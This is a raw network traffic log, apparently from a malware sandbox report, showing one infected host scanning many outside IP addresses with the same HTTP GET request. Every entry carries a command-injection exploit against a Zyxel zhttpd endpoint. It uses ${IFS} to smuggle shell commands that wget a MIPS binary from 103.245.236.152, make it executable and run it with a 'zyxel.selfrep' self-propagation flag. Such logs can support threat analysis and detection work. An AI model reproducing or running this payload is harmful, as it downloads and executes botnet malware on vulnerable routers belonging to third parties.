                                            Jan 14, 2024 15:50:38.397686958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4080192.168.2.233701695.196.49.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397708893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4081192.168.2.236036271.186.80.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397738934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4082192.168.2.235736843.61.60.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397758961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4083192.168.2.234879847.32.129.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397789955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4084192.168.2.2334386154.210.226.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397830963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4085192.168.2.2355878120.161.206.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397876978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4086192.168.2.23525304.222.169.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397907019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4087192.168.2.233321480.161.124.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397922039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4088192.168.2.2359320189.217.13.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397939920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4089192.168.2.233883294.27.191.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397949934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4090192.168.2.235127277.217.173.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397999048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4091192.168.2.2344128115.253.212.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398053885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4092192.168.2.234232625.201.46.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398080111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4093192.168.2.2360442209.197.155.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398102045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4094192.168.2.2335312137.216.156.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398158073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4095192.168.2.2348902170.192.72.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398166895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4096192.168.2.2345654220.21.198.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398204088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4097192.168.2.234232485.183.166.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398241043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4098192.168.2.2355580153.181.164.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398266077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4099192.168.2.2340202211.96.55.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398310900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4100192.168.2.23350349.214.181.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398339987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4101192.168.2.235133814.4.181.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398361921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4102192.168.2.2353074115.251.243.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398420095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4103192.168.2.234091619.23.31.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398444891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4104192.168.2.2357334139.89.189.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398464918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4105192.168.2.2352886126.33.168.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398489952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4106192.168.2.235155480.95.34.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398540974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4107192.168.2.233779287.156.170.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398571014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4108192.168.2.2347148187.44.57.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398585081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4109192.168.2.2336174216.64.140.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398600101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4110192.168.2.2348356136.160.213.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398643017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4111192.168.2.2347156196.137.153.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398669004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4112192.168.2.234064261.184.78.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398682117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4113192.168.2.2340852141.246.84.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398729086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4114192.168.2.2355658151.172.130.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.398768902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4115192.168.2.234372414.154.48.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.401074886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4116192.168.2.2335910194.131.146.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.401093006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4117192.168.2.233325873.210.0.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.401180983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4118192.168.2.233807641.48.44.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.401221037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4119192.168.2.2343478159.160.158.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.401245117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4120192.168.2.2353558160.154.20.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402668953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4121192.168.2.234407280.88.226.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402703047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4122192.168.2.2355340142.186.156.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402731895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4123192.168.2.233288483.135.109.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402756929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4124192.168.2.2339892181.143.86.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402817965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4125192.168.2.236099638.206.155.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402833939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4126192.168.2.2352592131.103.78.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402848005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4127192.168.2.234520047.76.194.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402868986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4128192.168.2.2337070117.39.225.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402911901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4129192.168.2.2343740180.197.30.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402911901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4130192.168.2.2351444140.27.206.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.402918100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4131192.168.2.2338678160.220.35.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403004885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4132192.168.2.233507447.231.27.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403028965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4133192.168.2.233714859.42.120.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403053999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4134192.168.2.2358788133.243.238.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403064013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4135192.168.2.2349998211.112.104.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403090954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4136192.168.2.2334254202.60.150.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403120041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4137192.168.2.2350170174.10.138.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403150082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4138192.168.2.235687680.14.217.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403203964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4139192.168.2.235878070.46.20.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403213978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4140192.168.2.235221482.120.182.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403254986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4141192.168.2.235204290.185.3.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403295040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4142192.168.2.2343598210.22.253.147443
                                            TimestampBytes transferredDirectionData
